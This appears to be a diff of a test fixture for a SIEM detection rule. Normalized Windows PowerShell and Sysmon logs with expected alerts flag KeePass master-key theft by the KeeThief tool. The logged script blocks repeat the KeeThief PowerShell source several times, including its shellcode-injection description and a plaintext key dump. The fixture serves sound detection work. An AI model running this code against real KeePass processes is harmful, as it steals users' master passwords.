KeePassVersion : 2.34.0.0\\n ProcessID : 4184\\n ExecutablePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\KeePass-2.34\\\\KeePass.exe\\n EncryptedBlobAddress : 49045328\\n EncryptedBlob : {113, 148, 127, 29...}\\n EncryptedBlobLen : 64\\n PlaintextBlob : {120, 181, 162, 116...}\\n Plaintext : eLWidCSt...\\n KeyFilePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\AppData\\\\Roaming\\\\KeePass\\\\ProtectedUserKey.bin\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpKeyFile\\n KeePassVersion : 2.34.0.0\\n ProcessID : 4184\\n ExecutablePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\KeePass-2.34\\\\KeePass.exe\\n EncryptedBlobAddress : 49037240\\n EncryptedBlob : {137, 185, 6, 97...}\\n EncryptedBlobLen : 32\\n PlaintextBlob : {177, 5, 150, 205...}\\n Plaintext : sQWWzdcT...\\n KeyFilePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Documents\\\\s.license\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpPassword\\n KeePassVersion : 2.34.0.0\\n ProcessID : 4184\\n ExecutablePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\KeePass-2.34\\\\KeePass.exe\\n EncryptedBlobAddress : 48920376\\n EncryptedBlob : {228, 78, 75, 16...}\\n EncryptedBlobLen : 16\\n PlaintextBlob : {80, 97, 115, 115...}\\n Plaintext : Password123!\\n KeyFilePath :\\n\\n .EXAMPLE\\n\\n PS C:\\\\> Get-Process KeePass | Get-KeePassDatabaseKey -Verbose\\n VERBOSE: Examining KeePass process 4184 for master keys\\n\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpUserAccount\\n ....\\n# >\\n [CmdletBinding()] \\n param (\\n [Parameter(Position = 0, ValueFromPipeline = $True)]\\n [System.Diagnostics.Process[]]\\n [ValidateNotNullOrEmpty()]\\n $Process\\n )\\n \\n BEGIN {\\n if(-not $PSBoundParameters['Process']) {\\n try {\\n $Process = Get-Process KeePass -ErrorAction Stop | Where-Object {$_.FileVersion -match '^2\\\\.'}\\n }\\n catch {\\n throw 'No KeePass 2.X instances open!'\\n }\\n }\\n\\n # load file off of disk instead\\n # $Assembly = [Reflection.Assembly]::LoadFile((Get-Item -Path .\\\\ReleaseKeePass.exe).FullName)\\n\\n # the KeyTheft assembly, generated with \\\"Out-CompressedDll -FilePath .\\\\ReleaseKeePass.exe | Out-File -Encoding ASCII .\\\\compressed.ps1\\\"\\n\\n }\\n\\n PROCESS {\\n\\n ForEach($KeePassProcess in $Process) {\\n\\n if($KeePassProcess.FileVersion -match '^2\\\\.') {\\n\\n $WMIProcess = Get-WmiObject win32_process -Filter \\\"ProcessID = $($KeePassProcess.ID)\\\"\\n $ExecutablePath = $WMIProcess | Select-Object -Expand ExecutablePath\\n\\n Write-Verbose \\\"Examining KeePass process $($KeePassProcess.ID) for master keys\\\"\\n\\n $Keys = $Assembly.GetType('KeeTheft.Program').GetMethod('GetKeePassMasterKeys').Invoke($null, @([System.Diagnostics.Process]$KeePassProcess))\\n\\n if($Keys) {\\n\\n ForEach ($Key in $Keys) {\\n\\n ForEach($UserKey in $Key.UserKeys) {\\n\\n $KeyType = $UserKey.GetType().Name\\n\\n $UserKeyObject = New-Object PSObject\\n $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation\\n $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType\\n $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion\\n $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID\\n $UserKeyObject | Add-Member Noteproperty 'ExecutablePath' $ExecutablePath\\n $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobAddress' $UserKey.encryptedBlobAddress\\n $UserKeyObject | Add-Member Noteproperty 'EncryptedBlob' $UserKey.encryptedBlob\\n $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen\\n $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob\\n\\n if($KeyType -eq 'KcpPassword') {\\n $Plaintext = [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob)\\n }\\n else {\\n $Plaintext = [Convert]::ToBase64String($UserKey.plaintextBlob)\\n }\\n\\n $UserKeyObject | Add-Member Noteproperty 'Plaintext' $Plaintext\\n\\n if($KeyType -eq 'KcpUserAccount') {\\n try {\\n $WMIProcess = Get-WmiObject win32_process -Filter \\\"ProcessID = $($KeePassProcess.ID)\\\"\\n $UserName = $WMIProcess.GetOwner().User\\n\\n $ProtectedUserKeyPath = Resolve-Path -Path \\\"$($Env:WinDir | Split-Path -Qualifier)\\\\Users\\\\*$UserName*\\\\AppData\\\\Roaming\\\\KeePass\\\\ProtectedUserKey.bin\\\" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path\\n\\n $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath\\n\\n }\\n catch {\\n Write-Warning \\\"Error enumerating the owner of $($KeePassProcess.ID) : $_\\\"\\n }\\n }\\n else {\\n $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $UserKey.keyFilePath\\n }\\n\\n $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys')\\n $UserKeyObject\\n }\\n }\\n }\\n else {\\n Write-Verbose \\\"No keys found for $($KeePassProcess.ID)\\\"\\n }\\n }\\n else {\\n Write-Warning \\\"Only KeePass 2.X is supported at this time.\\\"\\n }\\n }\\n }\\n}\\n\",\"Name\":\"ScriptBlockText\"},{\"text\":\"d4643a9b-6f64-4fbc-95e8-c2524689590f\",\"Name\":\"ScriptBlockId\"},{\"text\":\"C:\\\\Users\\\\Administrator\\\\Downloads\\\\KeeThief_test\\\\KeeThief-master\\\\KeeTheft\\\\KeeTheft\\\\KeeThief.ps1\",\"Name\":\"Path\"}]}}}", "category.generic": "Command", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Operating system", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-PowerShell/Operational", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Common_PowerShell_4104_Command_executed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4104", "normalized": true, "numfield1": 1, "numfield2": 1, "object": "command", "object.account.id": "S-1-5-18", "object.fullpath": "C:\\Users\\Administrator\\Downloads\\KeeThief_test\\KeeThief-master\\KeeTheft\\KeeTheft\\KeeThief.ps1", "object.id": "d4643a9b-6f64-4fbc-95e8-c2524689590f", "object.name": "KeeThief.ps1", "object.path": "C:\\Users\\Administrator\\Downloads\\KeeThief_test\\KeeThief-master\\KeeTheft\\KeeTheft\\", "object.process.cmdline": "# requires -version 2function Get-KeePassDatabaseKey {<# .SYNOPSIS Retrieves database mastey key information for unlocked KeePass database. Function: Get-KeePassDatabaseKey Author: Lee Christensen (@tifkin_), Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Enumerates any KeePass 2.X (.NET) processes currently open, or takes a process object on the pipeline. Loades the C# KeeTheft assembly into memory and for each open KeePass process executes the GetKeePassMasterKeys() method on it. GetKeePassMasterKeys() will attach to the target KeePass process using CLR MD and enumerate all CLR heap objects, searching for a KeePassLib.PwDatabase object. If one is found, the path is extracted from the m_strUrl field, and all referenced objects are enumerated, searching for a KeePassLib.Keys.CompositeKey. If a composite master key is found, information for each key type (KcpPassword, KcpKeyFile, KcpUserAccount) is extracted, including the DPAPI encrypted data blobs of key data. For any encrypted blobs found, shellcode is injected into the KeePass process that calls MyRtlDecryptMemory() to decrypt the DPAPI memory blobs, returning the plaintext/unprotected key data. .PARAMETER Process Optional KeePass process object to pass in on the pipeline. .EXAMPLE PS C:\\> Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49045328 EncryptedBlob : {113, 148, 127, 29...} EncryptedBlobLen : 64 PlaintextBlob : {120, 181, 162, 116...} Plaintext : eLWidCSt... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpKeyFile KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49037240 EncryptedBlob : {137, 185, 6, 97...} EncryptedBlobLen : 32 PlaintextBlob : {177, 5, 150, 205...} Plaintext : sQWWzdcT... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\Documents\\s.license Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpPassword KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 48920376 EncryptedBlob : {228, 78, 75, 16...} EncryptedBlobLen : 16 PlaintextBlob : {80, 97, 115, 115...} Plaintext : Password123! KeyFilePath : .EXAMPLE PS C:\\> Get-Process KeePass | Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount ....# > [CmdletBinding()] param ( [Parameter(Position = 0, ValueFromPipeline = $True)] [System.Diagnostics.Process[]] [ValidateNotNullOrEmpty()] $Process ) BEGIN { if(-not $PSBoundParameters['Process']) { try { $Process = Get-Process KeePass -ErrorAction Stop | Where-Object {$_.FileVersion -match '^2\\.'} } catch { throw 'No KeePass 2.X instances open!' } } # load file off of disk instead # $Assembly = [Reflection.Assembly]::LoadFile((Get-Item -Path .\\ReleaseKeePass.exe).FullName) # the KeyTheft assembly, generated with \"Out-CompressedDll -FilePath .\\ReleaseKeePass.exe | Out-File -Encoding ASCII .\\compressed.ps1\" } PROCESS { ForEach($KeePassProcess in $Process) { if($KeePassProcess.FileVersion -match '^2\\.') { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $ExecutablePath = $WMIProcess | Select-Object -Expand ExecutablePath Write-Verbose \"Examining KeePass process $($KeePassProcess.ID) for master keys\" $Keys = $Assembly.GetType('KeeTheft.Program').GetMethod('GetKeePassMasterKeys').Invoke($null, @([System.Diagnostics.Process]$KeePassProcess)) if($Keys) { ForEach ($Key in $Keys) { ForEach($UserKey in $Key.UserKeys) { $KeyType = $UserKey.GetType().Name $UserKeyObject = New-Object PSObject $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID $UserKeyObject | Add-Member Noteproperty 'ExecutablePath' $ExecutablePath $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobAddress' $UserKey.encryptedBlobAddress $UserKeyObject | Add-Member Noteproperty 'EncryptedBlob' $UserKey.encryptedBlob $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob if($KeyType -eq 'KcpPassword') { $Plaintext = [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob) } else { $Plaintext = [Convert]::ToBase64String($UserKey.plaintextBlob) } $UserKeyObject | Add-Member Noteproperty 'Plaintext' $Plaintext if($KeyType -eq 'KcpUserAccount') { try { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $UserName = $WMIProcess.GetOwner().User $ProtectedUserKeyPath = Resolve-Path -Path \"$($Env:WinDir | Split-Path -Qualifier)\\Users\\*$UserName*\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin\" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath } catch { Write-Warning \"Error enumerating the owner of $($KeePassProcess.ID) : $_\" } } else { $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $UserKey.keyFilePath } $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys') $UserKeyObject } } } else { Write-Verbose \"No keys found for $($KeePassProcess.ID)\" } } else { Write-Warning \"Only KeePass 2.X is supported at this time.\" } } }}", "object.process.id": "7064", "object.value": "# requires -version 2function Get-KeePassDatabaseKey {<# .SYNOPSIS Retrieves database mastey key information for unlocked KeePass database. Function: Get-KeePassDatabaseKey Author: Lee Christensen (@tifkin_), Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Enumerates any KeePass 2.X (.NET) processes currently open, or takes a process object on the pipeline. Loades the C# KeeTheft assembly into memory and for each open KeePass process executes the GetKeePassMasterKeys() method on it. GetKeePassMasterKeys() will attach to the target KeePass process using CLR MD and enumerate all CLR heap objects, searching for a KeePassLib.PwDatabase object. If one is found, the path is extracted from the m_strUrl field, and all referenced objects are enumerated, searching for a KeePassLib.Keys.CompositeKey. If a composite master key is found, information for each key type (KcpPassword, KcpKeyFile, KcpUserAccount) is extracted, including the DPAPI encrypted data blobs of key data. For any encrypted blobs found, shellcode is injected into the KeePass process that calls MyRtlDecryptMemory() to decrypt the DPAPI memory blobs, returning the plaintext/unprotected key data. .PARAMETER Process Optional KeePass process object to pass in on the pipeline. .EXAMPLE PS C:\\> Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49045328 EncryptedBlob : {113, 148, 127, 29...} EncryptedBlobLen : 64 PlaintextBlob : {120, 181, 162, 116...} Plaintext : eLWidCSt... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpKeyFile KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49037240 EncryptedBlob : {137, 185, 6, 97...} EncryptedBlobLen : 32 PlaintextBlob : {177, 5, 150, 205...} Plaintext : sQWWzdcT... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\Documents\\s.license Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpPassword KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 48920376 EncryptedBlob : {228, 78, 75, 16...} EncryptedBlobLen : 16 PlaintextBlob : {80, 97, 115, 115...} Plaintext : Password123! KeyFilePath : .EXAMPLE PS C:\\> Get-Process KeePass | Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount ....# > [CmdletBinding()] param ( [Parameter(Position = 0, ValueFromPipeline = $True)] [System.Diagnostics.Process[]] [ValidateNotNullOrEmpty()] $Process ) BEGIN { if(-not $PSBoundParameters['Process']) { try { $Process = Get-Process KeePass -ErrorAction Stop | Where-Object {$_.FileVersion -match '^2\\.'} } catch { throw 'No KeePass 2.X instances open!' } } # load file off of disk instead # $Assembly = [Reflection.Assembly]::LoadFile((Get-Item -Path .\\ReleaseKeePass.exe).FullName) # the KeyTheft assembly, generated with \"Out-CompressedDll -FilePath .\\ReleaseKeePass.exe | Out-File -Encoding ASCII .\\compressed.ps1\" } PROCESS { ForEach($KeePassProcess in $Process) { if($KeePassProcess.FileVersion -match '^2\\.') { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $ExecutablePath = $WMIProcess | Select-Object -Expand ExecutablePath Write-Verbose \"Examining KeePass process $($KeePassProcess.ID) for master keys\" $Keys = $Assembly.GetType('KeeTheft.Program').GetMethod('GetKeePassMasterKeys').Invoke($null, @([System.Diagnostics.Process]$KeePassProcess)) if($Keys) { ForEach ($Key in $Keys) { ForEach($UserKey in $Key.UserKeys) { $KeyType = $UserKey.GetType().Name $UserKeyObject = New-Object PSObject $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID $UserKeyObject | Add-Member Noteproperty 'ExecutablePath' $ExecutablePath $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobAddress' $UserKey.encryptedBlobAddress $UserKeyObject | Add-Member Noteproperty 'EncryptedBlob' $UserKey.encryptedBlob $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob if($KeyType -eq 'KcpPassword') { $Plaintext = [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob) } else { $Plaintext = [Convert]::ToBase64String($UserKey.plaintextBlob) } $UserKeyObject | Add-Member Noteproperty 'Plaintext' $Plaintext if($KeyType -eq 'KcpUserAccount') { try { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $UserName = $WMIProcess.GetOwner().User $ProtectedUserKeyPath = Resolve-Path -Path \"$($Env:WinDir | Split-Path -Qualifier)\\Users\\*$UserName*\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin\" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath } catch { Write-Warning \"Error enumerating the owner of $($KeePassProcess.ID) : $_\" } } else { $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $UserKey.keyFilePath } $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys') $UserKeyObject } } } else { Write-Verbose \"No keys found for $($KeePassProcess.ID)\" } } else { Write-Warning \"Only KeePass 2.X is supported at this time.\" } } }}", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-06T11:33:47.757Z", "status": "success", "subject": "account", "subject.account.id": "S-1-5-18", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T18:55:02.710Z", "type": "raw", "uuid": "3e774e05-1f1a-4b58-812a-3127158afc3a"} -{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"8\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"8\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T18:55:04.9801378Z\"},\"EventRecordID\":\"7071\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1816\",\"ThreadID\":\"1228\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-04-27 18:55:04.980\"},{\"Name\":\"SourceProcessGuid\",\"text\":\"{365abb72-a512-5cc4-0000-0010c05e1b00}\"},{\"Name\":\"SourceProcessId\",\"text\":\"2856\"},{\"Name\":\"SourceImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"},{\"Name\":\"TargetProcessGuid\",\"text\":\"{365abb72-a201-5cc4-0000-00104f500800}\"},{\"Name\":\"TargetProcessId\",\"text\":\"2364\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Program Files\\\\KeePass Password Safe 2\\\\KeePass.exe\"},{\"Name\":\"NewThreadId\",\"text\":\"1384\"},{\"Name\":\"StartAddress\",\"text\":\"0x06160000\"},{\"Name\":\"StartModule\"},{\"Name\":\"StartFunction\"}]}}}", "category.generic": "Thread", "category.high": "Availability Management", "category.low": "Control", "datafield6": "0x06160000", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_8_Create_remote_thread", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "8", "normalized": true, "object": "thread", "object.id": "1384", "object.process.fullpath": "c:\\program files\\keepass password safe 2\\keepass.exe", "object.process.guid": "365abb72-a201-5cc4-0000-00104f500800", "object.process.id": "2364", "object.process.name": "keepass.exe", "object.process.path": "c:\\program files\\keepass password safe 2\\", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-06T03:10:10.818Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "subject.process.guid": "365abb72-a512-5cc4-0000-0010c05e1b00", "subject.process.id": "2856", "subject.process.name": "powershell.exe", "subject.process.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T18:55:04.980Z", "type": "raw", "uuid": "d26cbfcd-61bb-4a46-83a3-3a1379d98dbc"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"8\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"8\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T18:55:04.7106082Z\"},\"EventRecordID\":\"7070\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1816\",\"ThreadID\":\"1228\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-04-27 18:55:04.710\"},{\"Name\":\"SourceProcessGuid\",\"text\":\"{365abb72-a512-5cc4-0000-0010c05e1b00}\"},{\"Name\":\"SourceProcessId\",\"text\":\"2856\"},{\"Name\":\"SourceImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"},{\"Name\":\"TargetProcessGuid\",\"text\":\"{365abb72-a201-5cc4-0000-00104f500800}\"},{\"Name\":\"TargetProcessId\",\"text\":\"2364\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Program Files\\\\KeePass Password Safe 2\\\\KeePass.exe\"},{\"Name\":\"NewThreadId\",\"text\":\"3796\"},{\"Name\":\"StartAddress\",\"text\":\"0x76FAEC4B\"},{\"Name\":\"StartModule\",\"text\":\"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll\"},{\"Name\":\"StartFunction\",\"text\":\"DbgUiRemoteBreakin\"}]}}}", "category.generic": "Thread", "category.high": "Availability Management", "category.low": "Control", "datafield6": "0x76FAEC4B", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_8_Create_remote_thread", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "8", "normalized": true, "object": "thread", "object.fullpath": "c:\\windows\\system32\\ntdll.dll", "object.id": "3796", "object.name": "ntdll.dll", "object.path": "c:\\windows\\system32\\", "object.process.fullpath": "c:\\program files\\keepass password safe 2\\keepass.exe", "object.process.guid": "365abb72-a201-5cc4-0000-00104f500800", "object.process.id": "2364", "object.process.name": "keepass.exe", "object.process.path": "c:\\program files\\keepass password safe 2\\", "object.property": "start function", "object.value": "DbgUiRemoteBreakin", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-06T03:10:10.818Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "subject.process.guid": "365abb72-a512-5cc4-0000-0010c05e1b00", "subject.process.id": "2856", "subject.process.name": "powershell.exe", "subject.process.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T18:55:04.710Z", "type": "raw", "uuid": "45f9b787-ef50-4e90-9a77-52c768689039"} -expect 1 {"correlation_name": "Keepass_Key_Dump_Via_KeeThief"} \ No newline at end of file +expect 1 {"action": "extract", "alert.context": "getmethod('getkeepassmasterkeys').invoke", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "Credentials from Password Stores: Password Managers", "correlation_name": "Keepass_Key_Dump_Via_KeeThief", "correlation_type": "incident", "datafield6": "0x76FAEC4B", "event_src.category": "Other", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Keepass_Key_Dump_Via_KeeThief|iewin7|c:\\program files\\keepass password safe 2\\keepass.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "numfield1": 1, "numfield2": 1, "object": "application", "object.fullpath": "c:\\windows\\system32\\ntdll.dll", "object.id": "3796", "object.name": "ntdll.dll", "object.path": "c:\\windows\\system32\\", "object.process.fullpath": "c:\\program files\\keepass password safe 2\\keepass.exe", "object.process.guid": "365abb72-a201-5cc4-0000-00104f500800", "object.process.id": "2364", "object.process.name": "keepass.exe", "object.process.path": "c:\\program files\\keepass password safe 2\\", "object.property": "start function", "object.value": "DbgUiRemoteBreakin", "status": "success", "subject.account.id": "S-1-5-18", "subject.id": "d4643a9b-6f64-4fbc-95e8-c2524689590f", "subject.process.cmdline": "# requires -version 2function Get-KeePassDatabaseKey {<# .SYNOPSIS Retrieves database mastey key information for unlocked KeePass database. Function: Get-KeePassDatabaseKey Author: Lee Christensen (@tifkin_), Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Enumerates any KeePass 2.X (.NET) processes currently open, or takes a process object on the pipeline. Loades the C# KeeTheft assembly into memory and for each open KeePass process executes the GetKeePassMasterKeys() method on it. GetKeePassMasterKeys() will attach to the target KeePass process using CLR MD and enumerate all CLR heap objects, searching for a KeePassLib.PwDatabase object. If one is found, the path is extracted from the m_strUrl field, and all referenced objects are enumerated, searching for a KeePassLib.Keys.CompositeKey. If a composite master key is found, information for each key type (KcpPassword, KcpKeyFile, KcpUserAccount) is extracted, including the DPAPI encrypted data blobs of key data. For any encrypted blobs found, shellcode is injected into the KeePass process that calls MyRtlDecryptMemory() to decrypt the DPAPI memory blobs, returning the plaintext/unprotected key data. .PARAMETER Process Optional KeePass process object to pass in on the pipeline. .EXAMPLE PS C:\\> Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49045328 EncryptedBlob : {113, 148, 127, 29...} EncryptedBlobLen : 64 PlaintextBlob : {120, 181, 162, 